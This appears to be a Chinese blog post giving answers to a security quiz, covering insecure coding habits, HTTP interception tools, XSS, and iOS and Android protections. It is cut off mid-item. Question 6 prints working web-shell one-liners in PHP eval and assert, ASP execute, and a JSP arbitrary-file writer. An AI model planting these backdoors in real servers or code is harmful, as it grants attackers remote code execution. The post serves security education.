这篇文章的原文在:原文地址
1、应用程序开发过程中,下面哪些开发习惯可能导致安全漏洞?
- 在程序代码中打印日志输出敏感信息方便测试(√)
- 在使用数组前判断是否越界
- 在生成随机数前使用当前时间设置随机数种子(√)
- 设置配置文件权限为
rw-rw-rw-
(√)
只说一下第三个吧,给出篇文章随机数是骗人的
这篇文章中提到的另一篇文章我也给出链接,省去大家查找的时间当随机不够随机:一个在线扑克游戏的教训
看完你就可以了解为什么这个做法也会导致安全漏洞,微信公众号黑客 Hub
转载这篇文章时给出的解释认为这样不会产生漏洞是错误的
2、以下哪些工具提供拦截和修改 HTTP 数据包的功能?
- BurpSuite
- HackBar
- Fiddler
- Nmap
Fiddler 和 BurpSuite 都可以拦截和修改 HTTP 数据包
常用的 Firefox插件
- Firebug(抓包与各种调试)
- Tamper Data(拦截修改)
- Live Http Header(重放功能)
- Hackbar(编码解码/POST提交)
- Modify Headers(修改头部)
3、坏人通过 XSS 漏洞获取到 QQ 用户的身份后,可以进行以下哪些操作?
- 偷取 Q 币
- 控制用户摄像头
- 劫持微信账户
- 进入 QQ 空间
个人认为只有进入 QQ 空间可以
4、以下哪些工具可以抓取 HTTP 数据包?
- BurpSuite
- Wireshark
- Fiddler
- Nmap
BurpSuite、Wireshark 和 Fiddler 都是常见的抓包工具
5、以下哪些说法是正确的?
- iOS 系统从 iOS6 开始引入了 kernel ASLR 安全措施(√)
- 主流的 iPhone 手机 SoC 芯片内置了 AES 及 RSA 硬件加解密引擎(√)
- 安卓系统采用了安全引导链(Secure Boot Chain),而 iOS 系统则未采用
- Android 4.1 系统默认启用了内存 ASLR(√)
6、以下哪些是常见的 PHP 一句话木马?
<?php assert($_POST[value]);?>
(√)<%execute(request("value"))%>
<?php @eval($_POST[value]);?>
(√)<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
第二个是 asp 的一句话木马,第四个是 jsp 的一句话小马,这已经不能算是一句话了,assert 是可以替换 eval 的函数,不过 assert 常被禁用,所以场景很少,不知道算不算得常见?
7、以下哪个说法是正确的?
- XcodeGhost 是一种可以直接远程手机控制权的攻击方式
- Wormhole 是一种可以直接远程手机控制权的攻击方式
- “心脏滴血”是一种可以直接远程手机控制权的攻击方式
- ShellShock 是一种可以直接远程手机控制权的攻击方式
XcodeGhost 是在 2015 年被发现的大量 Xcode 编辑器被第三方代码注入,导致编译出来的 App 都存在后门
Wormhole 是在百度全家桶上大面积爆发的一个后门程序
“心